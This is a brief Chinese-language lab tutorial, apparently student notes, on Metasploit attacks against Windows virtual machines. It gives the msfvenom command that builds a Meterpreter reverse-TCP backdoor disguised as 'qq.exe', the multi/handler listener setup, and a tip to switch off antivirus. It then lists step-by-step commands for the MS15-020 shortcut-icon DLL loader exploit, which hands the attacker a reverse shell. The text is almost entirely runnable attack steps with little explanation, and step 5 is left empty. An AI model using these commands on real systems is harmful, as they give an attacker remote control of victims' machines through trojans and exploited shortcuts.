MSF-Shellcode生成和MS15-020 渗透利用

1、生成window下后门程序
A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.130 LPORT=4444 -f exe > /qq.exe

2、重新打开一个配置窗口
use exploit/multi/handler
set payloads windows/meterpreter/reverse_tcp
set lhost 192.168.200.107
set lport 4444（默认）
exploit

3、找到生成的QQ.exe文件，把他复制到要攻击的主机上
这里要说几个注意事项
1.网络设配器最好都要在NET模式且IP地址为统一网关
2、复制不了的情况是因为没有设置文件共享的路径，两个虚拟机都设置一下

3、把自己电脑的防火墙，各种杀毒软件全关了，不然生成的木马软件会被自动移除

4、在被攻击的主机上打开QQ.exe，在输入shell就可以开始操控了

附：声称其他格式的木马程序的方法

MS15-020 渗透利用

1、
search ms15-020 //搜索漏洞
use exploit/windows/smb/ms15_020_shortcut_icon_dllloader //漏洞模块
info //查看漏洞相关信息
set payload windows/meterpreter/reverse_tcp //设置一个反弹shell
2、
设置好参数（这里老师给的实验文档有点问题）
正确的应该是：
Set Lhost 192.168.86.130 //设置漏洞成功利用后后门连接的地址kali 主机
set lport 4444
3.exploit //执行漏洞

4、在 /root/.msf4/local/msf.lnk中找到这个文件。复制到XP主机上，点击
5、

这样就可以了。